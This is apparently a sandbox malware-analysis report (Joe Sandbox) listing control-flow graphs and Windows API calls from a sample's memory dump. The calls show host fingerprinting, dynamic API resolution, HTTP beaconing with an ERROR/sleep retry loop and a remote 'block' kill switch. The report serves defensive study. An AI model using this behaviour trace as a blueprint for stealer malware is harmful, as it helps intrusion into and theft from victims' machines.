                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 63780d9f777650afd734e616368d2701b7f39f90a7d4d5c2d516ead005d7fe82
                                    • Instruction ID: b0cdb527e6f4a6bfc1358dd670fe6e597f46089021fd3469bb12e23f3ef5535a
                                    • Opcode Fuzzy Hash: 63780d9f777650afd734e616368d2701b7f39f90a7d4d5c2d516ead005d7fe82
                                    • Instruction Fuzzy Hash: F1715D71A0025CABEB24EFA0DC49BEE7774BF44700F108199F20AAB5D4DBB46A85DF51

                                    Control-flow Graph

                                    control_flow_graph 1275 ff78e0-ff7937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 ff7939-ff793e 1275->1276 1277 ff7942-ff7945 1275->1277 1278 ff7962-ff7972 1276->1278 1277->1278
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00FF792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 6294f956c57884385f501669d702a22a3203bb6ae6129381eb57fdd16cd9b7ba
                                    • Instruction ID: adbde3b151c847f16968fe3157bbc794e280e4a366cc889bd2f9f8a87db75775
                                    • Opcode Fuzzy Hash: 6294f956c57884385f501669d702a22a3203bb6ae6129381eb57fdd16cd9b7ba
                                    • Instruction Fuzzy Hash: 970186B1904209EBD724DF95DD49BAFFBB8FB04B21F104259FA45E3680C7B459008BA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE11B7), ref: 00FF7880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FF789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 12adba91eefa430fa49c184205ae6650cc7c1900f862206a343b4687a84151ab
                                    • Instruction ID: 0be28ef317ca6872687b7fd8ee758be6a9540b2897436f99dd12496b8ebbd871
                                    • Opcode Fuzzy Hash: 12adba91eefa430fa49c184205ae6650cc7c1900f862206a343b4687a84151ab
                                    • Instruction Fuzzy Hash: 86F04FB1944208ABC724DF98D949FAEFBB8FB04711F10065AFA05A3A80C7B45504CBA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 97e1a46d90c00074139f430a68ff9a1a75e93baac076657feacab99a84c13664
                                    • Instruction ID: de6d5b014ac7b1ca957e2d74291032dfdf3396fe1a4927f0048ed4a43e9c82b0
                                    • Opcode Fuzzy Hash: 97e1a46d90c00074139f430a68ff9a1a75e93baac076657feacab99a84c13664
                                    • Instruction Fuzzy Hash: 13D05E7490030CEBCB24DFE1E84D6EDBB78FB08311F001554D90663B40EA305481CBA9

                                    Control-flow Graph

                                    control_flow_graph 633 ff9c10-ff9c1a 634 ffa036-ffa0ca LoadLibraryA * 8 633->634 635 ff9c20-ffa031 GetProcAddress * 43 633->635 636 ffa0cc-ffa141 GetProcAddress * 5 634->636 637 ffa146-ffa14d 634->637 635->634 636->637 638 ffa216-ffa21d 637->638 639 ffa153-ffa211 GetProcAddress * 8 637->639 640 ffa21f-ffa293 GetProcAddress * 5 638->640 641 ffa298-ffa29f 638->641 639->638 640->641 642 ffa337-ffa33e 641->642 643 ffa2a5-ffa332 GetProcAddress * 6 641->643 644 ffa41f-ffa426 642->644 645 ffa344-ffa41a GetProcAddress * 9 642->645 643->642 646 ffa428-ffa49d GetProcAddress * 5 644->646 647 ffa4a2-ffa4a9 644->647 645->644 646->647 648 ffa4dc-ffa4e3 647->648 649 ffa4ab-ffa4d7 GetProcAddress * 2 647->649 650 ffa515-ffa51c 648->650 651 ffa4e5-ffa510 GetProcAddress * 2 648->651 649->648 652 ffa612-ffa619 650->652 653 ffa522-ffa60d GetProcAddress * 10 650->653 651->650 654 ffa67d-ffa684 652->654 655 ffa61b-ffa678 GetProcAddress * 4 652->655 653->652 656 ffa69e-ffa6a5 654->656 657 ffa686-ffa699 GetProcAddress 654->657 655->654 658 ffa708-ffa709 656->658 659 ffa6a7-ffa703 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,017F5060), ref: 00FF9C2D
                                    • GetProcAddress.KERNEL32(75900000,017F4DE0), ref: 00FF9C45
                                    • GetProcAddress.KERNEL32(75900000,01809650), ref: 00FF9C5E
                                    • GetProcAddress.KERNEL32(75900000,018096B0), ref: 00FF9C76
                                    • GetProcAddress.KERNEL32(75900000,0180CF38), ref: 00FF9C8E
                                    • GetProcAddress.KERNEL32(75900000,0180D088), ref: 00FF9CA7
                                    • GetProcAddress.KERNEL32(75900000,017FB0A8), ref: 00FF9CBF
                                    • GetProcAddress.KERNEL32(75900000,0180D1D8), ref: 00FF9CD7
                                    • GetProcAddress.KERNEL32(75900000,0180CF80), ref: 00FF9CF0
                                    • GetProcAddress.KERNEL32(75900000,0180D0A0), ref: 00FF9D08
                                    • GetProcAddress.KERNEL32(75900000,0180CFB0), ref: 00FF9D20
                                    • GetProcAddress.KERNEL32(75900000,017F5100), ref: 00FF9D39
                                    • GetProcAddress.KERNEL32(75900000,017F4F60), ref: 00FF9D51
                                    • GetProcAddress.KERNEL32(75900000,017F4EA0), ref: 00FF9D69
                                    • GetProcAddress.KERNEL32(75900000,017F5160), ref: 00FF9D82
                                    • GetProcAddress.KERNEL32(75900000,0180D0B8), ref: 00FF9D9A
                                    • GetProcAddress.KERNEL32(75900000,0180D1A8), ref: 00FF9DB2
                                    • GetProcAddress.KERNEL32(75900000,017FB0F8), ref: 00FF9DCB
                                    • GetProcAddress.KERNEL32(75900000,017F4F40), ref: 00FF9DE3
                                    • GetProcAddress.KERNEL32(75900000,0180CFF8), ref: 00FF9DFB
                                    • GetProcAddress.KERNEL32(75900000,0180CF68), ref: 00FF9E14
                                    • GetProcAddress.KERNEL32(75900000,0180D0D0), ref: 00FF9E2C
                                    • GetProcAddress.KERNEL32(75900000,0180CFC8), ref: 00FF9E44
                                    • GetProcAddress.KERNEL32(75900000,017F5080), ref: 00FF9E5D
                                    • GetProcAddress.KERNEL32(75900000,0180D058), ref: 00FF9E75
                                    • GetProcAddress.KERNEL32(75900000,0180CF98), ref: 00FF9E8D
                                    • GetProcAddress.KERNEL32(75900000,0180D010), ref: 00FF9EA6
                                    • GetProcAddress.KERNEL32(75900000,0180D148), ref: 00FF9EBE
                                    • GetProcAddress.KERNEL32(75900000,0180D1C0), ref: 00FF9ED6
                                    • GetProcAddress.KERNEL32(75900000,0180D100), ref: 00FF9EEF
                                    • GetProcAddress.KERNEL32(75900000,0180CFE0), ref: 00FF9F07
                                    • GetProcAddress.KERNEL32(75900000,0180CF50), ref: 00FF9F1F
                                    • GetProcAddress.KERNEL32(75900000,0180D0E8), ref: 00FF9F38
                                    • GetProcAddress.KERNEL32(75900000,0180A6B8), ref: 00FF9F50
                                    • GetProcAddress.KERNEL32(75900000,0180D118), ref: 00FF9F68
                                    • GetProcAddress.KERNEL32(75900000,0180D130), ref: 00FF9F81
                                    • GetProcAddress.KERNEL32(75900000,017F50C0), ref: 00FF9F99
                                    • GetProcAddress.KERNEL32(75900000,0180D028), ref: 00FF9FB1
                                    • GetProcAddress.KERNEL32(75900000,017F4F80), ref: 00FF9FCA
                                    • GetProcAddress.KERNEL32(75900000,0180D160), ref: 00FF9FE2
                                    • GetProcAddress.KERNEL32(75900000,0180D1F0), ref: 00FF9FFA
                                    • GetProcAddress.KERNEL32(75900000,017F4E20), ref: 00FFA013
                                    • GetProcAddress.KERNEL32(75900000,017F4E40), ref: 00FFA02B
                                    • LoadLibraryA.KERNEL32(0180D040,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA03D
                                    • LoadLibraryA.KERNEL32(0180D178,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA04E
                                    • LoadLibraryA.KERNEL32(0180D070,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA060
                                    • LoadLibraryA.KERNEL32(0180D190,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA072
                                    • LoadLibraryA.KERNEL32(0180D208,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA083
                                    • LoadLibraryA.KERNEL32(0180CF20,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA095
                                    • LoadLibraryA.KERNEL32(0180D2E0,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA0A7
                                    • LoadLibraryA.KERNEL32(0180D2F8,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA0B8
                                    • GetProcAddress.KERNEL32(75FD0000,017F51A0), ref: 00FFA0DA
                                    • GetProcAddress.KERNEL32(75FD0000,0180D388), ref: 00FFA0F2
                                    • GetProcAddress.KERNEL32(75FD0000,01808F70), ref: 00FFA10A
                                    • GetProcAddress.KERNEL32(75FD0000,0180D280), ref: 00FFA123
                                    • GetProcAddress.KERNEL32(75FD0000,017F51C0), ref: 00FFA13B
                                    • GetProcAddress.KERNEL32(734B0000,017FAB58), ref: 00FFA160
                                    • GetProcAddress.KERNEL32(734B0000,017F52C0), ref: 00FFA179
                                    • GetProcAddress.KERNEL32(734B0000,017FABD0), ref: 00FFA191
                                    • GetProcAddress.KERNEL32(734B0000,0180D4C0), ref: 00FFA1A9
                                    • GetProcAddress.KERNEL32(734B0000,0180D430), ref: 00FFA1C2
                                    • GetProcAddress.KERNEL32(734B0000,017F5280), ref: 00FFA1DA
                                    • GetProcAddress.KERNEL32(734B0000,017F54E0), ref: 00FFA1F2
                                    • GetProcAddress.KERNEL32(734B0000,0180D3E8), ref: 00FFA20B
                                    • GetProcAddress.KERNEL32(763B0000,017F54C0), ref: 00FFA22C
                                    • GetProcAddress.KERNEL32(763B0000,017F54A0), ref: 00FFA244
                                    • GetProcAddress.KERNEL32(763B0000,0180D358), ref: 00FFA25D
                                    • GetProcAddress.KERNEL32(763B0000,0180D370), ref: 00FFA275
                                    • GetProcAddress.KERNEL32(763B0000,017F5500), ref: 00FFA28D
                                    • GetProcAddress.KERNEL32(750F0000,017FAC48), ref: 00FFA2B3
                                    • GetProcAddress.KERNEL32(750F0000,017FAB80), ref: 00FFA2CB
                                    • GetProcAddress.KERNEL32(750F0000,0180D268), ref: 00FFA2E3
                                    • GetProcAddress.KERNEL32(750F0000,017F5200), ref: 00FFA2FC
                                    • GetProcAddress.KERNEL32(750F0000,017F53A0), ref: 00FFA314
                                    • GetProcAddress.KERNEL32(750F0000,017FAC98), ref: 00FFA32C
                                    • GetProcAddress.KERNEL32(75A50000,0180D220), ref: 00FFA352
                                    • GetProcAddress.KERNEL32(75A50000,017F5320), ref: 00FFA36A
                                    • GetProcAddress.KERNEL32(75A50000,01809090), ref: 00FFA382
                                    • GetProcAddress.KERNEL32(75A50000,0180D3A0), ref: 00FFA39B
                                    • GetProcAddress.KERNEL32(75A50000,0180D298), ref: 00FFA3B3
                                    • GetProcAddress.KERNEL32(75A50000,017F5240), ref: 00FFA3CB
                                    • GetProcAddress.KERNEL32(75A50000,017F5360), ref: 00FFA3E4
                                    • GetProcAddress.KERNEL32(75A50000,0180D310), ref: 00FFA3FC
                                    • GetProcAddress.KERNEL32(75A50000,0180D3B8), ref: 00FFA414
                                    • GetProcAddress.KERNEL32(75070000,017F5460), ref: 00FFA436
                                    • GetProcAddress.KERNEL32(75070000,0180D478), ref: 00FFA44E
                                    • GetProcAddress.KERNEL32(75070000,0180D400), ref: 00FFA466
                                    • GetProcAddress.KERNEL32(75070000,0180D238), ref: 00FFA47F
                                    • GetProcAddress.KERNEL32(75070000,0180D4F0), ref: 00FFA497
                                    • GetProcAddress.KERNEL32(74E50000,017F5520), ref: 00FFA4B8
                                    • GetProcAddress.KERNEL32(74E50000,017F5260), ref: 00FFA4D1
                                    • GetProcAddress.KERNEL32(75320000,017F53E0), ref: 00FFA4F2
                                    • GetProcAddress.KERNEL32(75320000,0180D328), ref: 00FFA50A
                                    • GetProcAddress.KERNEL32(6F060000,017F5540), ref: 00FFA530
                                    • GetProcAddress.KERNEL32(6F060000,017F5380), ref: 00FFA548
                                    • GetProcAddress.KERNEL32(6F060000,017F5480), ref: 00FFA560
                                    • GetProcAddress.KERNEL32(6F060000,0180D418), ref: 00FFA579
                                    • GetProcAddress.KERNEL32(6F060000,017F51E0), ref: 00FFA591
                                    • GetProcAddress.KERNEL32(6F060000,017F5220), ref: 00FFA5A9
                                    • GetProcAddress.KERNEL32(6F060000,017F5400), ref: 00FFA5C2
                                    • GetProcAddress.KERNEL32(6F060000,017F52A0), ref: 00FFA5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00FFA5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00FFA607
                                    • GetProcAddress.KERNEL32(74E00000,0180D490), ref: 00FFA629
                                    • GetProcAddress.KERNEL32(74E00000,01809000), ref: 00FFA641
                                    • GetProcAddress.KERNEL32(74E00000,0180D340), ref: 00FFA659
                                    • GetProcAddress.KERNEL32(74E00000,0180D250), ref: 00FFA672
                                    • GetProcAddress.KERNEL32(74DF0000,017F52E0), ref: 00FFA693
                                    • GetProcAddress.KERNEL32(6F9C0000,0180D460), ref: 00FFA6B4
                                    • GetProcAddress.KERNEL32(6F9C0000,017F5420), ref: 00FFA6CD
                                    • GetProcAddress.KERNEL32(6F9C0000,0180D2B0), ref: 00FFA6E5
                                    • GetProcAddress.KERNEL32(6F9C0000,0180D3D0), ref: 00FFA6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 98c0402f9d4f4f709cd12b2a9ce095e5608b0076690a77eab5e3f100179ce79c
                                    • Instruction ID: 27aae555c3b91f26fd89a4aa67502635c987e330fde163471fbe4782671722bf
                                    • Opcode Fuzzy Hash: 98c0402f9d4f4f709cd12b2a9ce095e5608b0076690a77eab5e3f100179ce79c
                                    • Instruction Fuzzy Hash: 966218B5501200BFC378DFA8FA8C96E37F9F78C601314A52AE60AC7E4CD6799841DB59

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 858 ff5510-ff5577 call ff5ad0 call ffa820 * 3 call ffa740 * 4 874 ff557c-ff5583 858->874 875 ff55d7-ff564c call ffa740 * 2 call fe1590 call ff52c0 call ffa8a0 call ffa800 call ffaad0 StrCmpCA 874->875 876 ff5585-ff55b6 call ffa820 call ffa7a0 call fe1590 call ff51f0 874->876 902 ff5693-ff56a9 call ffaad0 StrCmpCA 875->902 906 ff564e-ff568e call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 875->906 891 ff55bb-ff55d2 call ffa8a0 call ffa800 876->891 891->902 907 ff56af-ff56b6 902->907 908 ff57dc-ff5844 call ffa8a0 call ffa820 * 2 call fe1670 call ffa800 * 4 call ff6560 call fe1550 902->908 906->902 910 ff56bc-ff56c3 907->910 911 ff57da-ff585f call ffaad0 StrCmpCA 907->911 1037 ff5ac3-ff5ac6 908->1037 914 ff571e-ff5793 call ffa740 * 2 call fe1590 call ff52c0 call ffa8a0 call ffa800 call ffaad0 StrCmpCA 910->914 915 ff56c5-ff5719 call ffa820 call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 910->915 930 ff5865-ff586c 911->930 931 ff5991-ff59f9 call ffa8a0 call ffa820 * 2 call fe1670 call ffa800 * 4 call ff6560 call fe1550 911->931 914->911 1013 ff5795-ff57d5 call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 914->1013 915->911 936 ff598f-ff5a14 call ffaad0 StrCmpCA 930->936 937 ff5872-ff5879 930->937 931->1037 966 ff5a28-ff5a91 call ffa8a0 call ffa820 * 2 call fe1670 call ffa800 * 4 call ff6560 call fe1550 936->966 967 ff5a16-ff5a21 Sleep 936->967 943 ff587b-ff58ce call ffa820 call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 937->943 944 ff58d3-ff5948 call ffa740 * 2 call fe1590 call ff52c0 call ffa8a0 call ffa800 call ffaad0 StrCmpCA 937->944 943->936 944->936 1042 ff594a-ff598a call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 944->1042 966->1037 967->874 1013->911 1042->936
                                    APIs
                                      • Part of subcall function 00FFA820: lstrlen.KERNEL32(00FE4F05,?,?,00FE4F05,01000DDE), ref: 00FFA82B
                                      • Part of subcall function 00FFA820: lstrcpy.KERNEL32(01000DDE,00000000), ref: 00FFA885
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF56A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5857
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5228
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5318
                                      • Part of subcall function 00FF52C0: lstrlen.KERNEL32(00000000), ref: 00FF532F
                                      • Part of subcall function 00FF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FF5364
                                      • Part of subcall function 00FF52C0: lstrlen.KERNEL32(00000000), ref: 00FF5383
                                      • Part of subcall function 00FF52C0: lstrlen.KERNEL32(00000000), ref: 00FF53AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00FF5A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 3c16ceb5f87f50fc3805d9ecd70f7353765a8d3c50ae4106ec16dda41212e286
                                    • Instruction ID: e33d0a1f3761fe4050ba6d4d317c47998dc50be249866e3581c98f27d47eb00e
                                    • Opcode Fuzzy Hash: 3c16ceb5f87f50fc3805d9ecd70f7353765a8d3c50ae4106ec16dda41212e286
                                    • Instruction Fuzzy Hash: F2E166B291010CAACB14FBA0EC56EFD7378AF54340F408158F60A575A5EF786B19EB92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1069 ff17a0-ff17cd call ffaad0 StrCmpCA 1072 ff17cf-ff17d1 ExitProcess 1069->1072 1073 ff17d7-ff17f1 call ffaad0 1069->1073 1077 ff17f4-ff17f8 1073->1077 1078 ff17fe-ff1811 1077->1078 1079 ff19c2-ff19cd call ffa800 1077->1079 1081 ff199e-ff19bd 1078->1081 1082 ff1817-ff181a 1078->1082 1081->1077 1084 ff187f-ff1890 StrCmpCA 1082->1084 1085 ff185d-ff186e StrCmpCA 1082->1085 1086 ff1835-ff1844 call ffa820 1082->1086 1087 ff1913-ff1924 StrCmpCA 1082->1087 1088 ff1932-ff1943 StrCmpCA 1082->1088 1089 ff18f1-ff1902 StrCmpCA 1082->1089 1090 ff1951-ff1962 StrCmpCA 1082->1090 1091 ff1970-ff1981 StrCmpCA 1082->1091 1092 ff18cf-ff18e0 StrCmpCA 1082->1092 1093 ff198f-ff1999 call ffa820 1082->1093 1094 ff18ad-ff18be StrCmpCA 1082->1094 1095 ff1849-ff1858 call ffa820 1082->1095 1096 ff1821-ff1830 call ffa820 1082->1096 1110 ff189e-ff18a1 1084->1110 1111 ff1892-ff189c 1084->1111 1108 ff187a 1085->1108 1109 ff1870-ff1873 1085->1109 1086->1081 1118 ff1926-ff1929 1087->1118 1119 ff1930 1087->1119 1097 ff194f 1088->1097 1098 ff1945-ff1948 1088->1098 1116 ff190e 1089->1116 1117 ff1904-ff1907 1089->1117 1099 ff196e 1090->1099 1100 ff1964-ff1967 1090->1100 1102 ff198d 1091->1102 1103 ff1983-ff1986 1091->1103 1114 ff18ec 1092->1114 1115 ff18e2-ff18e5 1092->1115 1093->1081 1112 ff18ca 1094->1112 1113 ff18c0-ff18c3 1094->1113 1095->1081 1096->1081 1097->1081 1098->1097 1099->1081 1100->1099 1102->1081 1103->1102 1108->1081 1109->1108 1123 ff18a8 1110->1123 1111->1123 1112->1081 1113->1112 1114->1081 1115->1114 1116->1081 1117->1116 1118->1119 1119->1081 1123->1081
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00FF17C5
                                    • ExitProcess.KERNEL32 ref: 00FF17D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: b1a3a8a4435e086401a9937e7b9bb40d06ed1f5fcb5eb422d44c9f02f1a37dd2
                                    • Instruction ID: 200ee2fb67f281830416375b6d24cda5adb1afd40cdb4acf105d9ae097ba0b2f
                                    • Opcode Fuzzy Hash: b1a3a8a4435e086401a9937e7b9bb40d06ed1f5fcb5eb422d44c9f02f1a37dd2
                                    • Instruction Fuzzy Hash: 85519EB5A0020DEFDB24DFA1D998BBE37B5BF04340F108049E606AB354D7B4D941EBA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1124 ff7500-ff754a GetWindowsDirectoryA 1125 ff754c 1124->1125 1126 ff7553-ff75c7 GetVolumeInformationA call ff8d00 * 3 1124->1126 1125->1126 1133 ff75d8-ff75df 1126->1133 1134 ff75fc-ff7617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 ff75e1-ff75fa call ff8d00 1133->1135 1137 ff7619-ff7626 call ffa740 1134->1137 1138 ff7628-ff7658 wsprintfA call ffa740 1134->1138 1135->1133 1145 ff767e-ff768e 1137->1145 1138->1145
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FF7542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FF757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF760A
                                    • wsprintfA.USER32 ref: 00FF7640
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
